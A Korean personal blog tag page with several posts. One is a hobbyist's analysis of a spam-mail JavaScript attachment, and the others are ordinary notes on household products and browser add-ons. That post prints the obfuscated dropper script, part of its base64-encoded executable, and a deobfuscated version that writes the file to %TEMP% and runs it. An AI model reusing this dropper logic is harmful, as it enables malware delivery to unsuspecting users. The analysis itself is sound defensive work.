• Home
  • Tag
  • LocationLog
  • Guestbook
  • Admin
  • Write
블로그 이미지

감사합니다.

안녕1999

카테고리

전체 (3067)
자바스크립트 (20)
안드로이드 (14)
WebGL (4)
변비 (17)
정치,경제 (35)
C언어,ARM (162)
컴퓨터(PC, Note Book, 윈.. (41)
전자회로, PCB (27)
유머,안웃긴,GIF,동영상 (118)
국부론60 (71)
모듈(PCB) (3)
건강 (2)
FreeCAD (25)
PADS (43)
퇴직,퇴사,구직,취업 활동 (3)
C# (86)
엑셀 (8)
워드 (0)
LabView (6)
레고 (30)
FPGA (0)
Total
Today
Yesterday
Tistory 로고 이미지 티스토리 가입하기!
태그 : 지역로그
방명록 : 관리자 : 글쓰기
Blog is powered
by Daum /
Designed by Tistory
RSS FEED

달력

« » 2025.6
일 월 화 수 목 금 토
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30

공지사항

태그목록

  • pcb
  • C
  • 비교
  • 문제
  • 핸드폰
  • 문재인
  • 에러
  • 제천
  • 안드로이드
  • 정부
  • 매실
  • arm
  • 자바스크립트
  • 대통령
  • 맛집
  • 윈도우
  • 레고
  • 이유
  • 옥션
  • 개발
  • 개선
  • 경제
  • 공무원
  • XP
  • 방법
  • 갤럭시
  • 광고
  • GCC
  • 어린이
  • 프로그램

최근에 올라온 글

'차단'에 해당되는 글 5건

  1. 2017.04.01 수맥차단 동판?
  2. 2016.10.29 구글애드센스 광고 카테고리 차단
  3. 2016.07.31 요즘 가스레인지
  4. 2016.07.23 스펨 메일의 정체 분석
  5. 2016.06.22 크롬 웹브라우져 확장 프로그램 - 구글 데이터 세이버 & 이미지 차단

수맥차단 동판?

카테고리 없음 / 2017. 4. 1. 23:30

수맥은 전자파일까?

자기장일까?

또다른 어떤 에너지일까?


수맥차단 동판등, 관련 제품을 파는 사람들도 잘 모릅니다.

그냥, "깔면 좋다"는 식입니다.

수맥이 인체에 큰 영향을 끼친다고 합니다.

한국의 온돌은, 방바닥에 물호스가 깔려있습니다.

보일러에서 물을 데워서, 방바닥을 흐르도록 합니다.

수맥이 땅속 수십미터에서 흐르는것에 비교해볼때,

1~5cm 밑에서 흐르는 물이 더 큰 영향을 끼칩니다.

보통 빛, 전자파등은 거리의 제곱에 반비례합니다.

이말은, 거리가 멀어질 수록, 영향이 엄청나게 줄어든다는 말입니다.

즉, 거리에 따른 영향이 절대적입니다.

불과 1~5cm 떨어진 방바닥의 물 흐름이 인체에 더 치명적일 수 있다는 말입니다.

그러나, 이는 처음부터 잘못되었습니다.


물의 흐름이 인체에 나쁜영향을 준다는 연구결과 같은건 없습니다.

단순히, 미신일뿐입니다.


어쨌든, 이러한, 수맥을 차단하기위해, 동판을 설치하는 분들이 종종 계십니다.

방 밑 바닥에 동판을 깔고, 물호스깔고, 시멘트로 덮는거죠.

동판에 수맥차단효과가 있다고 합니다.(전혀 검증되지 않은 이야기입니다.)


전자파적인 측면, 에너지 절약 측면에서 봤을때,

동판을 까는것은 좋습니다만,

1) 조각조각 깔면, 효과가 매우 떨어집니다.

가능하면, 방바닥 전체를 1장으로 깔아야 합니다.


2) 두꺼운 동판은 필요없습니다.

0.01mm라도 상관 없습니다.

0.001mm라도 상관없습니다.

구멍이 없어야 합니다.

전자파는 1mm구멍이 있어도 상관없습니다.

단열효과는 구멍이 없어야 합니다.

또한, 이어붙이는곳이 없어야 합니다.

물이 샌다면, 단열효과가 떨어집니다.


3) 동판일 필요도 없습니다.

알루미늄 호일도 단열효과, 전자파 차폐효과가 뛰어납니다.

물론, X선 레벨로 간다면, 납으로 만든 판을 매우 두껍게 깔아야 합니다.

핵폭탄 방어용으로는 좋습니다. 그러나, 너무 무겁고, 방바닥이 아닌, 천정에 납판을 용접해야죠.

금속이면 다 좋습니다.

열이나, 전자판는 금속 박막(얇은 막)을 통과하기 어렵습니다.

보온자재로 알루미늄 호일이 인기인 이유입니다.

일명 "열반사"보온재라고 합니다.

열에너지가 통과를 못하니, "열반사"는 거의 맞는 말이며,

단열효과가 뛰어납니다.

물론, 물도 새지 않도록 밀봉하는것이 원칙입니다.


일부, 업체들이 수맥차단 동판을 1mm 두께까지도 만들어 팔고 있으나,(매우비쌈)

수맥이 나쁘다는 연구결과도 없고, 전자, 단열측면에서는 0.001mm 알루미늄호일도 괜찮습니다.

너무 비싼 돈들여서, 수맥차단이 효과가 있니, 없니, 하지 마시고,

그돈으로, 알루미늄 호일로된 단열재나 충분이 까시기 바랍니다.

파는사람이 문제가 아니라, 사는 사람이 문제죠.

(수요가 있으니, 만드는것.)


여담으로, 전자파 차단용으로 설치한 동판은, 거꾸로,

전자파의 세기를 2배 증가시킬 수 도 있습니다.

반사되어 돌아오므로, 2배의 세기가 됩니다.

굳이 방바닥에 깔아야겠다면, 높은 침대라도 쓰는것이 더 좋은 생각입니다.

저작자표시 비영리 변경금지 (새창열림)
Posted by 안녕1999
, |

구글애드센스 광고 카테고리 차단

카테고리 없음 / 2016. 10. 29. 16:13
좋지 않은 카테고리는 차단했습니다.
대출광고 같은것들.
광고도 소비자에게 유익한것들만 있길 바랍니다.
이제서야 차단했네요...

구글 애드센스의 돌아가는것은 매우 불투명하네요.
요즘광고가, 광고주의 수익이 확인되야, 돈을 지급하는 방식이 많다보니...
저작자표시 비영리 변경금지 (새창열림)
Posted by 안녕1999
, |

요즘 가스레인지

카테고리 없음 / 2016. 7. 31. 19:27
가스렌지에 온도센서가 달려 나온다.
너무 뜨거우면, 불이 꺼진다고 한다.
이제 냄비 태워먹을일 없겠다. ㅎㅎㅎ
가스가 켜져 있는데, 불이 꺼지면, 삐삐삐 소리가 나고, 꺼진다고 한다.
(내가 제대로 들었나?)
좋은 세상이다.

그런데, 살던 사람들은 배관을 어디로 한거야???
배관 흔적이 없음.


가운데 튀어나온게 센서
스프링방식

큰 건전지가 들어 있다.

이건 이마트에서 약 16만8천원에 가져온것
가스렌지는 설치하시는분 불러서 해야함.

Rinnai RTR-R1001 LNG
저작자표시 비영리 변경금지 (새창열림)
Posted by 안녕1999
, |

스펨 메일의 정체 분석

카테고리 없음 / 2016. 7. 23. 01:00

요즘 회사메일로 스펨메일이 많이 오고 있다.

스펨등록을 해도 소용이 없다. 매번 다른 메일주소로 날라오니...


너무 많이 오는통에, 짜증이나서,

이 쓰레기같은 메일이 무엇인지 분석해보았다.


첨부파일은 압축파일이며,

압축파일 안에는 자바스크립트 파일이 들어 있다.


자바스크립트파일은 메모장에서도 편집이 가능하다.

var ZYb = " 321" + "";

var KXi6 = "Run" + "";

var Ts = "in" + "";

var Gf9 = ".b" + "";

var Nk2 = "xe" + "";

var ZQl = ".e" + "";

function YPp4(Qp){return Qp;};var FGi3 = "l" + "";

var Pg6 = "ESv" + "";

var ELz = "K2DPj" + "";

function Fw5(NGi){return NGi;};var Yh7 = "%/" + "";

var PEl = "MP" + "";

var Hm = "%TE" + "";

function So4(XUz3){return XUz3;};var Gj = "l" + "";

var Dv8 = "Shel" + "";

var Uq = "pt." + "";

var YBh = "WScri" + "";


(생략) 


var v_bin = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAA

Byd01o5gz0vfxXl3DacBcKAAAM9JWvsaeyBL39oHJffNj7F6LwjPS9/G5+91gzYvCMwVI5FEAM9L38YvC

/1g2uAgAAa8ARM8Mz21OJRfj/FeT4QAD/1ovw/9cD8P/Xi038A8YxRfgz0oHJu7fc0WoEWPfxM9K5fvyty

BACU9m57XofjjQQAzRZwFfGFRqjPA99A10Gx46PfQjQC4pdhO1VCPhWD///+4UtQ2Bf915I+FWP///+h

6iQ/g6MGH/OLHRxBbZ1XYj1SZ9grtGMkROxWRLV0V3b/XmTqmd0F86fNumVTqOJOjb15Ufh8rFM2OF


(생략) 

var WUc6          = 1
var BMd             = (8330 - 8330)
var VKb = (-6867 + 6869)
var WMg4          = (9211 - 9210)

function UBb2(Rl, Nh8) {
    var TYp = WScript[Op + Gu + Tz]((function Ex9(){return VAg;}()) + DNx2 + NLp + Ke5 + PQo8 + Ki + KDm6);
    var UQp = TYp[CYr + ALc + (function FSn(){return RCm6;}())](Rl);
    var Pe0 = UQp[GRq + GHc + TXp + (function XTm4(){return Gf;}())](WUc6, BMd);
    
    var Zn = WScript[SSz0(Op) + (function By(){return Gu;}()) + Tz](Pr + Km + Io + Cj + Sb + UTx);
    var KBc3 = Zn[AJc5 + Vi8 + ZOa2(Vk) + UGy](Ci0 + Gl + DUt8);
    KBc3[Vf + Vv] = "bin.base64";
    
    KBc3[AJh8] = Pe0[Ra9(RDj) + Io0(Za9)]();
    
    var CFt2 = WScript[Op + Gu + Tz](APa7 + Vi2 + (function OBc8(){return Oi8;}()) + JQd + WPi8(XTq));
    CFt2[AZl4] = WMg4;
    CFt2[YVm + (function LKz6(){return TPz;}())]();
    
    CFt2[FHb7 + EFk](KBc3[Lr4 + Gn4 + Px + Yy + WRr]);
    CFt2[Pw5 + Me + SPa2 + CBe](Nh8, VKb);
    
    Pe0[Mk]();
    CFt2[Mk]();
}


function Vx5(QFk, Nh8)
{
   var Og, NKj, QGj8
   var PDt2 = 31 - 30, AWl3 = 2;
   Og = new ActiveXObject(VAg + DNx2 + NLp + Ke5 + PQo8 + Ki + KDm6)
   NKj = Og[HXi5 + (function VPk1(){return Nb0;}()) + BIy3 + Kh4](Nh8, AWl3, true)
   NKj[FHb7 + EFk](QFk);
   NKj[Mk]();
   NKj = Og[Em9(HXi5) + Nb0 + BIy3 + Kh4](Nh8, PDt2);
   QGj8 = NKj[IBc + Yb1 + Nf8]();
   return(QGj8);
}

var EQl7=WScript[Op + OXk7(Gu) + Tz]((function WQg(){return YBh;}()) + Uq + Dv8 + So4(Gj));
var HHo3=EQl7.ExpandEnvironmentStrings(Hm + Fw5(PEl) + (function At(){return Yh7;}()));
var Gw5=HHo3 + ELz + YPp4(Pg6) + FGi3;
var RZh4=Gw5 + ZQl + Nk2;
var v_binpath=RZh4+Gf9+Ts;

try {
Vx5(v_bin, v_binpath);
UBb2(v_binpath, RZh4);
//EQl7[KXi6](RZh4 + ZYb);
}
catch (e) {WScript.Quit(1);};
WScript.Quit(0);



자바스크립트는 위와 같이 암호화 되어 있다.


var v_bin = "TVqQAAMAAAAEAAAA..."

이 내용은 Base64라는 코딩 방식이며, 내용물은 실행파일이 들어 있다.


스크립트문을 풀어보면


function Base64_to_bin_file(Rl, Nh8) {

    var TYp = WScript["CreateObject"]("Scripting.FileSystemObject");

    var UQp = TYp["GetFile"](Rl);

    var Pe0 = UQp["OpenAsTextStream"](1, 0);

    

    var Zn = WScript["CreateObject"]("MSXml2.DOMDocument");

    var KBc3 = Zn["createElement"]("Base64Data");

    KBc3["dataType"] = "bin.base64";

    

    KBc3["text"] = Pe0["ReadAll"]();

    

    var CFt2 = WScript["CreateObject"]("ADODB.Stream");

    CFt2["Type"] = 1;

    CFt2["Open"]();

    

    CFt2["Write"](KBc3["nodeTypedValue"]);

    CFt2["SaveToFile"](Nh8, 2);

    

    Pe0["Close"]();

    CFt2["Close"]();

}



function Create_K2DPjESvl_exe(QFk, Nh8)

{

   var Og, NKj, QGj8

   Og = new ActiveXObject("Scripting.FileSystemObject")

   NKj = Og["OpenTextFile"](Nh8, 2, true)

   NKj["Write"](QFk);

   NKj["Close"]();

   NKj = Og["OpenTextFile"](Nh8, 1);

   QGj8 = NKj["ReadLine"]();

   return(QGj8);

}


var EQl7=WScript["CreateObject"]("WScript.Shell");


var v_binpath=EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe.bin";


try {

Create_K2DPjESvl_exe(v_bin, v_binpath);

Base64_to_bin_file(v_binpath, EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe");

EQl7["Run"](EQl7.ExpandEnvironmentStrings("%TEMP%/") + "K2DPjESvl.exe 321");

}

catch (e) {WScript.Quit(1);};

WScript.Quit(0); 


위와 같이 아주 간단한 내용이다.


var v_bin = "TVqQAAMAAAAEAAAA..."

이내용을 파일로 저장하고, 다시 읽어서, Base64로 실행파일로 저장한 다음, 실행한다.


메일을 받은 사람이 자바스크립트 파일을 열어보는 순간, 자바스크립트가 실행되어,

실행파일을 생성하고, 실행파일을 동작시킨다.


(메모장으로 열때는 편집만 된다. 실행은 안된다.)

그러나 실수로, 인터넷 익스플로어로 열게되면, 자바스크립트가 실행된다.


실행파일의 내용은 시간관계상 분석 못한다.

관심있는분이 분석해주시면 감사하겠습니다.


INV000 b1a7.js(바이러스).zip


위 파일에는 내가 메일로 받은 파일이 들어있다.

안전을 위해, 파일확장자를 txt로 바꾸었으니, 실행되지는 않는다.

또한, 안전을 위해, 실행파일을 실행하는 명령은 주석처리가 되어 있다.

받아서, 메모장으로 열어봐도 문제는 없다.



보나마나 뻔한게, 랜섬웨어일 가능성이 높다.

요즘 돈되는건 랜섬웨어가 최고이니...


랜섬웨어는 하드디스크의 파일을 암호화시키고, 돈을 요구하는 프로그램이다.

돈 안주면, 파일 복구못한다.



마지막 실행문장은 제거후, 자바스크립트를 실행해서, 실행파일을 생성했다.

실행파일은 %TEMP%폴더에 생성된다.

윈도우 탐색기 주소창에 넣으면, 해당 폴더로 이동한다.


실행파일의 정보는 위와 같다.




실행파일이 사용하는 함수는 위와 같다. 177k의 비교적 작은 크기임에도, 온갖 종류의 기능은 다 사용하는듯 하다.

아마, 한번 실행되면, 여기저기 복사본을 만들듯 싶다.

스펨광고창부터, 랜섬웨어 기능까지...(추측)



Logo

www.hybrid-analysis.com

멜웨어, 바이러스등을 무료로, 자동으로 분석해주는 사이트이다.

분석결과는 "잘 모르겠음" ㅎㅎ(예상한대로)


https://www.hybrid-analysis.com/sample/0ae741fbcae6fb5af7bdec6e8219d02b522e74ac20906703b2573e14d1101252?environmentId=100


가상PC에서 직접 실행하면서 분석하기도 하나봅니다.


프로그램이라는게, 실행파일이 되면, 기계어코드만 남기때문에, 해당 코드가 무슨 목적으로 동작하는지 분석하기는 쉽지 않습니다.

해당 프로그램이 어떤 함수들을 호출하더라...는 정보로, 대충, 이럴것이다.

좀더 의심이 가면, 하나씩 분석을하게되면, 시간이 상당히 오래걸립니다.


제거 보기에는 이 프로그램은 암호화 기능을 사용해서, 랜덤하게 프로그램 코드를 생성하는듯 싶습니다.

그래야 백신프로그램도 잘 못잡거든요.


어쨌든, 전 시간이 없어, 더이상은 못합니다.


관심있으신분들 한번 분석해보시기 바랍니다.




  1. 안랩 랜섬웨어예방 - ahnlab.com‎

    광고www.ahnlab.com/‎
    최신 랜섬웨어 정보부터 피해 예방 가이드, 전용 백신까지!
    한국을 목표로 한 랜섬웨어, CryptoLocker 상세정보

검색결과

랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 감염되어 암호화 된 파일은 복호화 키가 없으면 복구가 불가능하다. 따라서 중요한 사용자 문서나 데이터들은 물리적으로 분리된 저장소에 정기적으로 백업해두는 습관을 길러 악성코드에 감염되더라도 피해를 최소화 할 수 있도록 해야 한다.2015. 11. 4.

[보안정보] 알기 쉬운 랜섬웨어 - Anti-Virus Leader ViRobot

www.hauri.co.kr/information/notice_view.html?intSeq=179&page=1
사용자 의견
이 결과에 관한 정보 • 

랜섬웨어 - 나무위키

https://namu.wiki/w/랜섬웨어
주의: 혹시 이 문서에 들어오신 분 중, 랜섬웨어에 감염되신 분이 있다면 당장 PC를 강제종료하고 모바일로 보시길 바랍니다! 컴퓨터를 계속 켜 두고 있으면 아직 ...

안랩 랜섬웨어 보안센터 | AhnLab

www.ahnlab.co.kr/kr/site/securityinfo/ransomware/index.do
랜섬웨어 피해가 확산되고 있어 각별한 주의가 필요합니다. 안랩은 랜섬웨어 동향과 피해 예방을 위한 보안 가이드를 드립니다.

[정보보호]걸리면 끝(?) 랜섬웨어...이렇게 하면 막는다 - 대한민국 IT포털 ...

www.etnews.com/20151108000034
2015. 11. 8. - PC에 저장된 사진, 동영상, 문서 파일을 인질로 잡는 랜섬웨어 피해가 급증했다. 랜섬웨어에 걸리면 이같은 메시지가 나타난다. (자료:알약블로그) ...

랜섬웨어 관련 이미지이미지 신고
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 검색결과
랜섬웨어에 대한 이미지 더보기

[보안정보] 알기 쉬운 랜섬웨어 - Anti-Virus Leader ViRobot

www.hauri.co.kr › 보안정보 › 보안공지
2015. 11. 4. - 랜섬웨어는 ransom(몸값)과 ware(제품)의 합성어로 컴퓨터 사용자의 PC나 문서를 '인질'로 잡고 돈을 요구한다고 해서 붙여진 명칭이다. 1989년 ...

뉴스
뉴스 검색결과의 이미지
"어떤 랜섬웨어나 해커도 침투 못 해"
Korea Daily‎ - 1일 전
'랜섬웨어'로 인한 피해가 연일 발생하는 등 컴퓨터 보안 문제가 심각한 사회문제로 대두하고 ...
랜섬웨어에 대한 뉴스 더보기

알약 공식 블로그 :: 랜섬웨어 'Crypt0L0cker'주의! - 알약(Alyac)

blog.alyac.co.kr/305
2015. 4. 21. - 이번에 발견된 랜섬웨어는 드라이브 바이 다운로드 형식으로 유포되고 있습니다. 드라이브 바이 다운로드는 OS 및 SW의 보안취약점을 통해 변조된 ...

랜섬웨어 제거 | 랜섬웨어란 무엇입니까 | Microsoft 보안

https://www.microsoft.com/ko-kr/security/.../ransomware-whatis.aspx
랜섬웨어란 무엇입니까? 랜섬웨어는 일종의 맬웨어 (악성 소프트웨어)로 사용자의 동의없이 해당 컴퓨터에 불법으로 설치됩니다. 불법으로 설치된 랜섬웨어로 해당 ...

한국랜섬웨어침해대응센터

https://www.rancert.com/
랜섬웨어진단/보안컨설팅, 침해사고접수/신고, 각종 피해사례 및 대응 방법 제공.

랜섬웨어 대응센터 - 한국트렌드마이크로

www.trendmicro.co.kr/kr/security-intelligence/ransomware/
트렌드마이크로 랜섬웨어 대응 솔루션. [기업] 이메일 탐지 및 차단 Deep Discovery Email Inspector. 새롭게 출현하는 랜섬웨어의 90% 이상은 피해자들의 이메일을 ..


저작자표시 비영리 변경금지 (새창열림)
Posted by 안녕1999
, |

크롬 웹브라우져 확장 프로그램 - 구글 데이터 세이버 & 이미지 차단

카테고리 없음 / 2016. 6. 22. 23:30

이미지, 동영상이 많은 우리나라에서는 별 효과없이, 느리기만 하다.

하지만, 데이터사용량이 돈과 직결되고, 택스트 위주의 웹서핑을 한다면, 써볼만하다.

예) 핸드폰으로 테더링할때


부가기능으로, 암호화기능이 됩니다.(압축되니깐)


https://chrome.google.com/webstore/detail/data-saver/pfmgfdlgomnbgkofeojodiodmgpgmkac/related?hl=ko&gl=KR



이와 더블어, 이미지 블록커도 같이 사용하면 좋습니다.

https://chrome.google.com/webstore/detail/block-image/pehaalcefcjfccdpbckoablngfkfgfgj/related?hl=ko&gl=KR





저작자표시 비영리 변경금지 (새창열림)
Posted by 안녕1999
, |
«이전 1 다음»

최근에 달린 댓글

글 보관함

링크

티스토리툴바

단축키

내 블로그

내 블로그 - 관리자 홈 전환
Q
Q
새 글 쓰기
W
W

블로그 게시글

글 수정 (권한 있는 경우)
E
E
댓글 영역으로 이동
C
C

모든 영역

이 페이지의 URL 복사
S
S
맨 위로 이동
T
T
티스토리 홈 이동
H
H
단축키 안내
Shift + /
⇧ + /

* 단축키는 한글/영문 대소문자로 이용 가능하며, 티스토리 기본 도메인에서만 동작합니다.